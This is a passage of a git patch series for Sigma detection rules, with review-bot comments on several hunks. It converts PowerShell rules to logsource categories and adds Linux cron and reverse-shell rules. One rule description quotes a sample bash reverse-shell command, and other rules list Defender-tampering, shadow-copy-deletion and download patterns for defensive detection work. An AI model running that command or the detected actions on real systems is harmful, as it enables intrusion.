@@ -6,16 +6,16 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md author: 'oscd.community, @redcanary, Zach Stanford @svch0st' date: 2020/10/08 +modified: 2021/10/16 tags: - attack.defense_evasion - attack.t1070.005 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: - 'Remove-SmbShare' - 'Remove-FileShare' diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_recon.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_recon.yml index a46b1d1b..d7468b44 100644 --- a/rules/windows/powershell/powershell_script/powershell_suspicious_recon.yml +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_recon.yml @@ -3,6 +3,7 @@ id: a9723fcc-881c-424c-8709-fd61442ab3c3 status: experimental author: frack113 date: 2021/07/30 +modified: 2021/10/16 description: Once established within a system or network, an adversary may use automated techniques for collecting internal data references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md @@ -11,11 +12,9 @@ tags: - attack.t1119 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: - selection_eventid: - EventID: 4104 selection_action: ScriptBlockText|contains: - 'Get-Service ' diff --git a/rules/windows/powershell/powershell_script/powershell_suspicious_win32_pnpentity.yml b/rules/windows/powershell/powershell_script/powershell_suspicious_win32_pnpentity.yml index 3cf7777d..55ce58dd 100644 --- a/rules/windows/powershell/powershell_script/powershell_suspicious_win32_pnpentity.yml +++ b/rules/windows/powershell/powershell_script/powershell_suspicious_win32_pnpentity.yml 
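Review bot: The powershell_suspicious_recon.yml hunk deletes the `selection_eventid` selection, but no hunk in that file touches its `condition:` line, which lies past the end of the hunk; the timestomp and wmi_persistence rules in this same commit needed a separate `condition: selection_ioc` hunk for the identical removal. If the condition still reads `selection_eventid and selection_action`, the rule now references an undefined selection and the converter will reject it. Please confirm the condition already named only `selection_action`, or add the missing hunk.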
@@ -3,6 +3,7 @@ id: b26647de-4feb-4283-af6b-6117661283c5 status: experimental author: frack113 date: 2021/08/23 +modified: 2021/10/16 description: Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md @@ -11,11 +12,10 @@ tags: - attack.t1120 logsource: product: windows - service: powershell + category: ps_script definition: EnableScriptBlockLogging must be set to enable detection: selection: - EventID: 4104 ScriptBlockText|contains: Win32_PnPEntity condition: selection falsepositives: diff --git a/rules/windows/powershell/powershell_script/powershell_timestomp.yml b/rules/windows/powershell/powershell_script/powershell_timestomp.yml index 5c53560c..b87e3354 100644 --- a/rules/windows/powershell/powershell_script/powershell_timestomp.yml +++ b/rules/windows/powershell/powershell_script/powershell_timestomp.yml @@ -3,6 +3,7 @@ id: c6438007-e081-42ce-9483-b067fbef33c3 status: experimental author: frack113 date: 2021/08/03 +modified: 2021/10/16 description: Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md @@ -12,11 +13,9 @@ tags: - attack.t1070.006 logsource: product: windows - service: powershell + category: ps_script definition: EnableScriptBlockLogging must be set to enable detection: - selection_id: - EventID: 4104 selection_ioc: ScriptBlockText|contains: - '.CreationTime =' 
@@ -25,7 +24,7 @@ detection: - '[IO.File]::SetCreationTime' - '[IO.File]::SetLastAccessTime' - '[IO.File]::SetLastWriteTime' - condition: selection_id and selection_ioc + condition: selection_ioc falsepositives: - legitime admin script level: medium diff --git a/rules/windows/powershell/powershell_script/powershell_trigger_profiles.yml b/rules/windows/powershell/powershell_script/powershell_trigger_profiles.yml index 58321ba2..99083248 100644 --- a/rules/windows/powershell/powershell_script/powershell_trigger_profiles.yml +++ b/rules/windows/powershell/powershell_script/powershell_trigger_profiles.yml @@ -3,6 +3,7 @@ id: 05b3e303-faf0-4f4a-9b30-46cc13e69152 status: experimental author: frack113 date: 2021/08/18 +modified: 2021/10/16 description: Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md @@ -11,11 +12,10 @@ tags: - attack.t1546.013 logsource: product: windows - service: powershell + category: ps_script definition: EnableScriptBlockLogging must be set to enable detection: selection: - EventID: 4104 ScriptBlockText|contains|all: - 'Add-Content' - '$profile' diff --git a/rules/windows/powershell/powershell_script/powershell_web_request.yml b/rules/windows/powershell/powershell_script/powershell_web_request.yml index fb66db23..2a6ff8e3 100644 --- a/rules/windows/powershell/powershell_script/powershell_web_request.yml +++ b/rules/windows/powershell/powershell_script/powershell_web_request.yml 
@@ -10,18 +10,17 @@ references: - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell author: James Pemberton / @4A616D6573 date: 2019/10/24 -modified: 2021/09/21 +modified: 2021/10/16 tags: - attack.execution - attack.t1059.001 - attack.t1086 #an old one logsource: product: windows - service: powershell + category: ps_script definition: 'Script block logging must be enabled' detection: selection: - EventID: 4104 ScriptBlockText|contains: - 'Invoke-WebRequest' - 'iwr ' diff --git a/rules/windows/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml b/rules/windows/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml index eb7f1ed0..db494165 100644 --- a/rules/windows/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml +++ b/rules/windows/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml @@ -4,6 +4,7 @@ description: Detects when a user disables the Windows Firewall via a Profile to status: experimental author: Austin Songer @austinsonger date: 2021/10/12 +modified: 2021/10/16 references: - https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps - https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell @@ -11,10 +12,9 @@ references: - http://woshub.com/manage-windows-firewall-powershell/ logsource: product: windows - service: powershell + category: ps_script detection: selection: - EventID: 4104 ScriptBlockText|contains|all: - Set-NetFirewallProfile - -Profile diff --git a/rules/windows/powershell/powershell_script/powershell_winlogon_helper_dll.yml b/rules/windows/powershell/powershell_script/powershell_winlogon_helper_dll.yml index d15724be..9054932c 100644 --- a/rules/windows/powershell/powershell_script/powershell_winlogon_helper_dll.yml +++ b/rules/windows/powershell/powershell_script/powershell_winlogon_helper_dll.yml 
@@ -4,16 +4,15 @@ status: experimental description: Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[Wow6432Node]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. author: Timur Zinniatullin, oscd.community date: 2019/10/21 -modified: 2020/12/01 +modified: 2021/10/16 references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: 'CurrentVersion\Winlogon' selection2: ScriptBlockText|contains: diff --git a/rules/windows/powershell/powershell_script/powershell_wmi_persistence.yml b/rules/windows/powershell/powershell_script/powershell_wmi_persistence.yml index 03fa7e18..65677d9d 100644 --- a/rules/windows/powershell/powershell_script/powershell_wmi_persistence.yml +++ b/rules/windows/powershell/powershell_script/powershell_wmi_persistence.yml @@ -3,6 +3,7 @@ id: 9e07f6e7-83aa-45c6-998e-0af26efd0a85 status: experimental author: frack113 date: 2021/08/19 +modified: 2021/10/16 description: Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md 
@@ -12,11 +13,9 @@ tags: - attack.t1546.003 logsource: product: windows - service: powershell + category: ps_script definition: EnableScriptBlockLogging must be set to enable detection: - selection_id: - EventID: 4104 selection_ioc: - ScriptBlockText|contains|all: - 'New-CimInstance ' @@ -28,7 +27,7 @@ detection: - '-Namespace root/subscription ' - '-ClassName CommandLineEventConsumer ' - '-Property ' #is a variable name - condition: selection_id and selection_ioc + condition: selection_ioc falsepositives: - Unknown level: medium \ No newline at end of file diff --git a/rules/windows/powershell/powershell_script/powershell_wmimplant.yml b/rules/windows/powershell/powershell_script/powershell_wmimplant.yml index 9ed475bd..cc59e934 100644 --- a/rules/windows/powershell/powershell_script/powershell_wmimplant.yml +++ b/rules/windows/powershell/powershell_script/powershell_wmimplant.yml @@ -11,14 +11,13 @@ tags: - attack.t1086 #an old one author: NVISO date: 2020/03/26 -modified: 2021/08/30 +modified: 2021/10/16 logsource: product: windows - service: powershell + category: ps_script definition: Script block logging must be enabled detection: selection: - EventID: 4104 ScriptBlockText|contains: - "WMImplant" - " change_user " From 690b26fb90e16f8355b5949a316e17685b660803 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 16 Oct 2021 08:19:25 +0200 Subject: [PATCH 1249/1367] change order to chain sysmon --- tools/config/generic/powershell.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/config/generic/powershell.yml b/tools/config/generic/powershell.yml index 6f8f3828..30d56127 100644 --- a/tools/config/generic/powershell.yml +++ b/tools/config/generic/powershell.yml @@ -1,5 +1,5 @@ title: Conversion of Generic Rules into Powershell Specific EventID Rules -order: 10 +order: 15 logsources: ps_module: category: ps_module From 4149fa8632412362b6ec1cb8a1cfba8155af5c3a Mon Sep 17 00:00:00 2001 
From: frack113 Date: Sat, 16 Oct 2021 08:26:51 +0200 Subject: [PATCH 1250/1367] change to category: ps_classic_* --- .../powershell_classic_alternate_powershell_hosts.yml | 5 ++--- .../powershell_classic/powershell_classic_powercat.yml | 5 ++--- .../powershell_classic_remote_powershell_session.yml | 5 ++--- .../powershell_classic_suspicious_download.yml | 6 ++---- .../powershell_delete_volume_shadow_copies.yml | 8 +++----- .../powershell_classic/powershell_downgrade_attack.yml | 4 ++-- .../powershell_classic/powershell_exe_calling_ps.yml | 4 ++-- .../powershell_classic/powershell_renamed_powershell.yml | 5 ++--- .../powershell_tamper_with_windows_defender.yml | 8 +++----- .../powershell_classic/powershell_xor_commandline.yml | 5 ++--- 10 files changed, 22 insertions(+), 33 deletions(-) diff --git a/rules/windows/powershell/powershell_classic/powershell_classic_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_classic/powershell_classic_alternate_powershell_hosts.yml index 154ddfde..1ba70f71 100644 --- a/rules/windows/powershell/powershell_classic/powershell_classic_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_classic/powershell_classic_alternate_powershell_hosts.yml @@ -6,7 +6,7 @@ related: description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: test date: 2019/08/11 -modified: 2021/09/21 +modified: 2021/10/16 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html @@ -16,11 +16,10 @@ tags: - attack.t1086 # an old one logsource: product: windows - service: powershell-classic + category: ps_classic_start definition: fields have to be extract from event detection: selection: - EventID: 400 HostApplication: '*' filter: HostApplication|startswith: 'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe' 
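Review bot: With `EventID: 400` removed, the remaining selection `HostApplication: '*'` in powershell_classic_alternate_powershell_hosts.yml is only a field-presence check, so the rule matches every event in the channel carrying HostApplication unless the generic config really maps `ps_classic_start` to EventID 400. The tools/config/generic/powershell.yml hunks visible in this series show only the `ps_module` entry, so I could not confirm that a `ps_classic_start` mapping exists; please verify it before merging. It would also help to record the dependency in the rule itself, e.g. `definition: EventID 400 via the ps_classic_start logsource; fields have to be extracted from the event`. The rule's condition lies outside the hunk.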
diff --git a/rules/windows/powershell/powershell_classic/powershell_classic_powercat.yml b/rules/windows/powershell/powershell_classic/powershell_classic_powercat.yml index 3ef28100..b9e8c6e7 100644 --- a/rules/windows/powershell/powershell_classic/powershell_classic_powercat.yml +++ b/rules/windows/powershell/powershell_classic/powershell_classic_powercat.yml @@ -6,7 +6,7 @@ related: status: experimental author: frack113 date: 2021/07/21 -modified: 2021/09/07 +modified: 2021/10/16 description: Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network references: - https://nmap.org/ncat/ @@ -17,11 +17,10 @@ tags: - attack.t1095 logsource: product: windows - service: powershell-classic + category: ps_classic_start definition: fields have to be extract from event detection: selection: - EventID: 400 HostApplication|contains: - 'powercat ' - 'powercat.ps1' diff --git a/rules/windows/powershell/powershell_classic/powershell_classic_remote_powershell_session.yml b/rules/windows/powershell/powershell_classic/powershell_classic_remote_powershell_session.yml index d720d95d..8605312d 100644 --- a/rules/windows/powershell/powershell_classic/powershell_classic_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_classic/powershell_classic_remote_powershell_session.yml @@ -6,7 +6,7 @@ related: description: Detects remote PowerShell sessions status: test date: 2019/08/10 -modified: 2021/09/21 +modified: 2021/10/16 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html @@ -19,11 +19,10 @@ tags: - attack.t1028 # an old one logsource: product: windows - service: powershell-classic + category: ps_classic_start definition: fields have to be extract from event detection: selection: - EventID: 400 HostName: 'ServerRemoteHost' HostApplication|contains: 'wsmprovhost.exe' condition: selection 
diff --git a/rules/windows/powershell/powershell_classic/powershell_classic_suspicious_download.yml b/rules/windows/powershell/powershell_classic/powershell_classic_suspicious_download.yml index 5560edef..551b1b68 100644 --- a/rules/windows/powershell/powershell_classic/powershell_classic_suspicious_download.yml +++ b/rules/windows/powershell/powershell_classic/powershell_classic_suspicious_download.yml @@ -11,19 +11,17 @@ tags: - attack.t1086 #an old one author: Florian Roth date: 2017/03/05 -modified: 2021/09/21 +modified: 2021/10/16 logsource: product: windows - service: powershell-classic + category: ps_classic_start definition: fields have to be extract from event detection: downloadfile: - EventID: 400 # get 400 ,403 and 600 for 1 execution HostApplication|contains|all: - 'System.Net.WebClient' - '.DownloadFile(' downloadstring: - EventID: 400 HostApplication|contains|all: - 'System.Net.WebClient' - '.DownloadString(' diff --git a/rules/windows/powershell/powershell_classic/powershell_delete_volume_shadow_copies.yml b/rules/windows/powershell/powershell_classic/powershell_delete_volume_shadow_copies.yml index a496ed90..039b436e 100644 --- a/rules/windows/powershell/powershell_classic/powershell_delete_volume_shadow_copies.yml +++ b/rules/windows/powershell/powershell_classic/powershell_delete_volume_shadow_copies.yml @@ -11,10 +11,10 @@ tags: status: experimental author: frack113 date: 2021/06/03 -modified: 2021/08/28 +modified: 2021/10/16 logsource: product: windows - service: powershell-classic + category: ps_classic_start definition: fields have to be extract from event detection: selection_obj: @@ -25,9 +25,7 @@ detection: HostApplication|contains: - 'Delete()' - 'Remove-WmiObject' - selection_eventid: - EventID: 400 - condition: selection_obj and selection_del and selection_eventid + condition: selection_obj and selection_del fields: - HostApplication falsepositives: 
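Review bot: The comment `# get 400 ,403 and 600 for 1 execution` in powershell_classic_suspicious_download.yml is deleted together with the `EventID: 400` line, and nothing else in the hunk preserves that observation even though it explains why the rule deliberately pins a single event type (otherwise one download would alert three times). Keep it with the rule, e.g. `definition: one execution emits events 400, 403 and 600, so only 400 is used via ps_classic_start; fields have to be extracted from the event`. The condition of this rule continues outside the hunk.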
diff --git a/rules/windows/powershell/powershell_classic/powershell_downgrade_attack.yml b/rules/windows/powershell/powershell_classic/powershell_downgrade_attack.yml index 8ace36f2..6ab90c2c 100644 --- a/rules/windows/powershell/powershell_classic/powershell_downgrade_attack.yml +++ b/rules/windows/powershell/powershell_classic/powershell_downgrade_attack.yml @@ -11,13 +11,13 @@ tags: - attack.t1086 # an old one author: Florian Roth (rule), Lee Holmes (idea), Harish Segar (improvements) date: 2017/03/22 +modified: 2021/10/16 logsource: product: windows - service: powershell-classic + category: ps_classic_start definition: fields have to be extract from event detection: selection: - EventID: 400 EngineVersion|startswith: '2.' filter: HostVersion|startswith: '2.' diff --git a/rules/windows/powershell/powershell_classic/powershell_exe_calling_ps.yml b/rules/windows/powershell/powershell_classic/powershell_exe_calling_ps.yml index 95749b73..4c4ddb2d 100644 --- a/rules/windows/powershell/powershell_classic/powershell_exe_calling_ps.yml +++ b/rules/windows/powershell/powershell_classic/powershell_exe_calling_ps.yml @@ -11,13 +11,13 @@ tags: - attack.t1086 # an old one author: Sean Metcalf (source), Florian Roth (rule) date: 2017/03/05 +modified: 2021/10/16 logsource: product: windows - service: powershell-classic + category: ps_classic_start definition: fields have to be extract from event detection: selection1: - EventID: 400 EngineVersion|startswith: - '2.' - '4.' diff --git a/rules/windows/powershell/powershell_classic/powershell_renamed_powershell.yml b/rules/windows/powershell/powershell_classic/powershell_renamed_powershell.yml index d0d732e1..95a2be97 100644 --- a/rules/windows/powershell/powershell_classic/powershell_renamed_powershell.yml +++ b/rules/windows/powershell/powershell_classic/powershell_renamed_powershell.yml 
@@ -6,18 +6,17 @@ references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse author: Harish Segar, frack113 date: 2020/06/29 -modified: 2021/08/18 +modified: 2021/10/16 tags: - attack.execution - attack.t1086 # an old one - attack.t1059.001 logsource: product: windows - service: powershell-classic + category: ps_classic_start definition: fields have to be extract from event detection: selection: - EventID: 400 HostName: ConsoleHost filter: HostApplication|startswith: diff --git a/rules/windows/powershell/powershell_classic/powershell_tamper_with_windows_defender.yml b/rules/windows/powershell/powershell_classic/powershell_tamper_with_windows_defender.yml index 3f32386d..896fbea5 100644 --- a/rules/windows/powershell/powershell_classic/powershell_tamper_with_windows_defender.yml +++ b/rules/windows/powershell/powershell_classic/powershell_tamper_with_windows_defender.yml @@ -9,17 +9,15 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md author: frack113 date: 2021/06/07 -modified: 2021/08/16 +modified: 2021/10/16 falsepositives: - Unknown level: high logsource: product: windows - service: powershell-classic + category: ps_classic_provider_start definition: fields have to be extract from event detection: - select_EventID: - EventID: 600 tamper_ps_action: HostApplication|contains: 'Set-MpPreference' tamper_ps_option: @@ -28,4 +26,4 @@ detection: - '-DisableBehaviorMonitoring 1' - '-DisableScriptScanning 1' - '-DisableBlockAtFirstSeen 1' - condition: select_EventID and tamper_ps_action and tamper_ps_option + condition: tamper_ps_action and tamper_ps_option diff --git a/rules/windows/powershell/powershell_classic/powershell_xor_commandline.yml b/rules/windows/powershell/powershell_classic/powershell_xor_commandline.yml index f4fc893d..725be9c9 100644 --- a/rules/windows/powershell/powershell_classic/powershell_xor_commandline.yml 
+++ b/rules/windows/powershell/powershell_classic/powershell_xor_commandline.yml @@ -4,18 +4,17 @@ description: Detects suspicious powershell process which includes bxor command, status: experimental author: Teymur Kheirkhabarov, Harish Segar (rule) date: 2020/06/29 -modified: 2021/08/28 +modified: 2021/10/16 tags: - attack.execution - attack.t1059.001 - attack.t1086 #an old one logsource: product: windows - service: powershell-classic + category: ps_classic_start definition: fields have to be extract from event detection: selection: - EventID: 400 HostName: "ConsoleHost" filter: HostApplication|contains: From 2b3e40e721345ea7dc34ce82fe7b3c0ba974dd78 Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Sat, 16 Oct 2021 02:33:01 -0400 Subject: [PATCH 1251/1367] Rule for Cron activity - file creation --- rules/linux/file_create/cron_files.yml | 33 ++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 rules/linux/file_create/cron_files.yml diff --git a/rules/linux/file_create/cron_files.yml b/rules/linux/file_create/cron_files.yml new file mode 100644 index 00000000..4f0a15f8 --- /dev/null +++ b/rules/linux/file_create/cron_files.yml 
@@ -0,0 +1,33 @@ +title: Cron Files +id: 6c4e2f43-d94d-4ead-b64d-97e53fa2bd05 +status: experimental +description: Detects creation of cron files or files in Cron directories. Potential persistence. +date: 2021/10/15 +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +tags: + - attack.persistence + - attack.t1053.003 +references: + - https://github.com/microsoft/MSTIC-Sysmon/blob/main/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml +logsource: + product: linux + category: file_create +detection: + selection1: + TargetFilename|startswith: + - '/etc/cron.d/' + - '/etc/cron.daily/' + - '/etc/cron.hourly/' + - '/etc/cron.monthly/' + - '/etc/cron.weekly/' + - '/var/spool/cron/crontabs/' + selection2: + TargetFilename|contains: + - '/etc/cron.allow' + - '/etc/cron.deny' + - '/etc/crontab' + condition: selection1 or selection2 +falsepositives: + - Any legitimate cron file. +level: medium + \ No newline at end of file From fc796df654b79d5a096880107c5238056a4d6aa7 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 16 Oct 2021 08:37:51 +0200 Subject: [PATCH 1252/1367] add references --- tools/config/generic/powershell.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/tools/config/generic/powershell.yml b/tools/config/generic/powershell.yml index 30d56127..82ce87c3 100644 --- a/tools/config/generic/powershell.yml +++ b/tools/config/generic/powershell.yml @@ -1,5 +1,10 @@ title: Conversion of Generic Rules into Powershell Specific EventID Rules order: 15 +# +# some references : +# https://redblueteam.wordpress.com/2020/02/08/enable-command-line-and-powershell-audit-for-better-threat-hunting/ +# https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.1 +# logsources: ps_module: category: ps_module From 114e44ce6b94cc10d537a3acddf3830920fd7213 Mon Sep 17 00:00:00 2001 
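Review bot: `selection1` pins user crontabs to `/var/spool/cron/crontabs/`, which is the Debian/Ubuntu layout; on RHEL-derived systems user crontabs are, to my knowledge, written directly under `/var/spool/cron/`, so those creations would be missed — using `- '/var/spool/cron/'` as the prefix covers both layouts. The hunk also ends with a `+` line that holds only whitespace and no newline at end of file; drop that line. Note that `TargetFilename|contains: '/etc/crontab'` also matches names such as `/etc/crontab.bak`, which is probably intended but worth a word in the description.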
From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 16 Oct 2021 11:11:19 +0200 Subject: [PATCH 1253/1367] move file --- .../linux/{ => process_creation}/lnx_system_network_discovery.yml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/linux/{ => process_creation}/lnx_system_network_discovery.yml (100%) diff --git a/rules/linux/lnx_system_network_discovery.yml b/rules/linux/process_creation/lnx_system_network_discovery.yml similarity index 100% rename from rules/linux/lnx_system_network_discovery.yml rename to rules/linux/process_creation/lnx_system_network_discovery.yml From ae22f2ae7eaaaa3d0a4b8b5fdc138a8bc97e5fab Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 16 Oct 2021 14:21:55 +0200 Subject: [PATCH 1254/1367] rule: Linux Bash reverse shell indicators --- .../lnx_back_connect_shell_dev.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/linux/process_creation/lnx_back_connect_shell_dev.yml diff --git a/rules/linux/process_creation/lnx_back_connect_shell_dev.yml b/rules/linux/process_creation/lnx_back_connect_shell_dev.yml new file mode 100644 index 00000000..63a2ffd4 --- /dev/null +++ b/rules/linux/process_creation/lnx_back_connect_shell_dev.yml @@ -0,0 +1,23 @@ +title: Linux Reverse Shell Indicator +id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871 +status: experimental +description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') +references: + - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md +date: 2021/10/16 +author: Florian Roth +logsource: + product: linux + category: network_connection +detection: + selection: + Image|endswith: '/bin/bash' + filter: + DestinationIp: + - '127.0.0.1' + - '0.0.0.0' + condition: selection and not filter +falsepositives: + - Unknown +level: critical + 
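Review bot: The loopback filter in lnx_back_connect_shell_dev.yml lists only `127.0.0.1` and `0.0.0.0`, so a bash connection to `::1` or to any other 127.0.0.0/8 address still fires at level critical; add at least `- '::1'` to `filter`. The description also has a typo: `description: Detects a bash connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')`. The rule depends on a linux `network_connection` logsource mapping, which the next commit in this series adds; keep the two together when cherry-picking.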
From 6660be975331c122d3ab9a3477f2ea051f7645d7 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 16 Oct 2021 14:22:48 +0200 Subject: [PATCH 1255/1367] config: network connection linux --- tools/config/generic/sysmon.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/tools/config/generic/sysmon.yml b/tools/config/generic/sysmon.yml index d7fc8989..a325c204 100644 --- a/tools/config/generic/sysmon.yml +++ b/tools/config/generic/sysmon.yml @@ -33,6 +33,14 @@ logsources: rewrite: product: windows service: sysmon + network_connectio_linux: + category: network_connection + product: linux + conditions: + EventID: 3 + rewrite: + product: linux + service: sysmon sysmon_status: category: sysmon_status product: windows From 7fc6532665156da0c2224a25523dc63ddf20a959 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 16 Oct 2021 22:49:20 +0200 Subject: [PATCH 1256/1367] fix yml --- tools/config/splunk-windows.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/config/splunk-windows.yml b/tools/config/splunk-windows.yml index 584fdfbf..06b0c730 100644 --- a/tools/config/splunk-windows.yml +++ b/tools/config/splunk-windows.yml @@ -32,7 +32,7 @@ logsources: # Optimized search for process creation, being dramatically faster in Lispy than just EventCode=1 search, as 'ParentProcessGuid' is more unique than '1' in the raw data. # This also supports custom splunk macros, just like they are written in splunk (i.e. as `macro`), minding that it has to be written inside the string quotes here. search: 'ParentProcessGuid EventCode=1' - windows-process-creation: + windows-file-creation: product: windows service: sysmon category: file_creation From 5756888b1b7ca4659eaa7ee376f67c51b2f4c1e5 Mon Sep 17 00:00:00 2001 
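Review bot: The new logsource key in tools/config/generic/sysmon.yml is spelled `network_connectio_linux`, missing the `n` of the `network_connection` category it maps. The key is only a label in this config, so conversion still works, but it should read `network_connection_linux` so greps and future edits find it next to its Windows counterpart. The rest of the logsources block continues outside the hunk.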
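Review bot: The renamed key `windows-file-creation` fixes the duplicate, but its `category: file_creation` does not match the `file_create` category used by the new linux cron rule elsewhere in this series, and this hunk does not show which spelling the generic Sysmon config maps; a rule whose category appears in no config is never rewritten to the intended `EventCode` search. Please confirm the canonical category name (Sigma rules for Sysmon EventID 11 commonly use `file_event`) and align this entry and the cron rule with it. The surrounding logsources block continues outside the hunk.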
From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 17 Oct 2021 08:33:32 +0200 Subject: [PATCH 1257/1367] adds the alternative options --- ..._creation_lolbins_suspicious_driver_installed_by_pnputil.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml b/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml index 1072fdb3..67dc8ab3 100644 --- a/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml +++ b/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml @@ -18,7 +18,9 @@ detection: selection: CommandLine|contains: - '-i' + - '/install' - '-a' + - '/add-driver' - '.inf' Image|endswith: - '\pnputil.exe' From 17d78a5c4c3fe0c75b627fe71445045dc6462d3a Mon Sep 17 00:00:00 2001 From: Wagga <6437862+wagga40@users.noreply.github.com> Date: Sun, 17 Oct 2021 16:21:59 +0200 Subject: [PATCH 1258/1367] Fix a missing var reset in SQLite backend --- tools/sigma/backends/sqlite.py | 1 + 1 file changed, 1 insertion(+) diff --git a/tools/sigma/backends/sqlite.py b/tools/sigma/backends/sqlite.py index 1f7e4e7e..0b445b59 100644 --- a/tools/sigma/backends/sqlite.py +++ b/tools/sigma/backends/sqlite.py @@ -109,6 +109,7 @@ class SQLiteBackend(SQLBackend): return self.generateFTS(self.cleanValue(str(node))) def generateQuery(self, parsed): + self.countFTS = 0 return self._generateQueryWithFields(parsed, list("*")) def checkFTS(self, parsed, result): From ccf6c8df38ef8ded5bbc679e73e4ead486b965f5 Mon Sep 17 00:00:00 2001 
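Review bot: The added `self.countFTS = 0` carries no comment explaining why the counter must be reset on every `generateQuery` call; from the commit title it appears to accumulate across `generateFTS` calls and would otherwise leak into the next converted rule, so a one-liner such as `# reset per query: countFTS accumulates across generateFTS calls and must not carry over between rules` would save the next reader the archaeology. If `__init__` (not visible here) does not also initialise `countFTS`, consider doing so, since `checkFTS` reads it and may be reached by other entry points. The enclosing SQLiteBackend class continues outside the hunk.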
From: Tran Trung Hieu Date: Mon, 18 Oct 2021 10:07:44 +0400 Subject: [PATCH 1259/1367] Create new rule for detecting Microsfot Defender Tampering via Registry --- .../registry_event_defender_disabled.yml | 11 +++--- ..._defender_realtime_protection_disabled.yml | 36 +++++++++++++++++++ 2 files changed, 43 insertions(+), 4 deletions(-) create mode 100644 rules/windows/registry_event/registry_event_defender_realtime_protection_disabled.yml diff --git a/rules/windows/registry_event/registry_event_defender_disabled.yml b/rules/windows/registry_event/registry_event_defender_disabled.yml index bdff48ba..0d3faa4e 100644 --- a/rules/windows/registry_event/registry_event_defender_disabled.yml +++ b/rules/windows/registry_event/registry_event_defender_disabled.yml @@ -5,12 +5,13 @@ related: type: derived description: Detects disabling Windows Defender threat protection date: 2020/07/28 -modified: 2021/09/21 -author: Ján Trenčanský, frack113 +modified: 2021/10/18 +author: Ján Trenčanský, frack113, AlertIQ references: - 